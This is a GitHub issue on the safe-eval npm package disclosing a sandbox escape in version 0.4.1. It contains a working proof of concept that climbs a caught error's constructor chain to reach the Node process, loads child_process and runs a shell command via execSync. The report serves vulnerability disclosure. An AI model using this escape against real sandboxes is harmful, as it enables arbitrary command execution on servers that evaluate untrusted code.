search

hacksparrow / safe-eval

Safer version of eval()
257 stars 37 forks source link

Sandbox Escape Bug #33

Open seongil-wi opened 1 year ago

seongil-wi commented 1 year ago 
// node version: 19.8.1
// safe-eval version: 0.4.1

var safeEval = require('safe-eval')

let code = ` 
(function() { 
    try{ 
        toLocaleString()
     } catch(pp){
        pp.constructor.constructor('return process')().mainModule.require('child_process').execSync('touch flag');
    }
})()
`

safeEval(code);

We found a sandbox escaping bug. This bug can be triggered by calling toLocaleString() function. Also, we can execute arbitrary shell code using the process module.